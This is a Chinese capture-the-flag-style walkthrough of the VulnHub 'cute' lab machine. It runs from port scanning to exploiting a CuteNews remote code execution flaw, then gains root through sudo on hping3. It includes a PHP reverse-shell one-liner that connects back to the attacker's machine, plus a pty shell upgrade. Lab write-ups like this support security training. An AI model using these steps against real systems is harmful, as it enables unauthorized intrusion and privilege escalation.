vulnhub-cute

admin 2020年12月1日11:19:41评论67 views字数 733阅读2分26秒阅读模式

实验环境

kali攻击机ip:192.168.3.31

cute靶机ip:192.168.3.47

知识点及工具

nmap扫描

目录扫描

CuteNews 远程代码执行

hping3提权

靶机难度

简单

开始渗透

首先第一步对目标靶机网络端口扫描 

nmapAp- 192.168.3.47

vulnhub-cute

扫描结果目标服务开放了22(ssh),80/88 (http)等端口

Web访问是一个apache默认页面

http://192.168.3.47

vulnhub-cute

使用目录扫描,扫描到了很多php文件

vulnhub-cute

访问index.php

http://192.168.3.47/index.php

可知为cuteNews cms,没有弱口令,我注册不了(无验证码),根据版本搜索对应漏洞

vulnhub-cute

https://www.exploit-db.com/exploits/48800

vulnhub-cute

修改exp中的代码,去掉CuteNews目录,因为靶机中安装在网站根目录

python3 CuteNews_rce.py

vulnhub-cute

由于这个shell不能切换目录,进行其他更多的操作,根据exp找到shell文件,在uploads目录下

vulnhub-cute

vulnhub-cute

没错了,可以执行命令,接下来反弹shell

php -r'$sock=fsockopen("192.168.3.31",1234);$proc=proc_open("/bin/sh -i",array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

vulnhub-cute

提升为交互式shell

python –c 'import pty;pty.spawn("/bin/bash")'

随手一个sudo –l 就有惊喜

vulnhub-cute

sudo hping3

vulnhub-cute

over


微信搜索m20151798添加好友

欢迎关注微信公众号

vulnhub-cute


本文始发于微信公众号(MrLee 小师父):vulnhub-cute

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年12月1日11:19:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub-cutehttp://cn-sec.com/archives/193891.html

发表评论

匿名网友 填写信息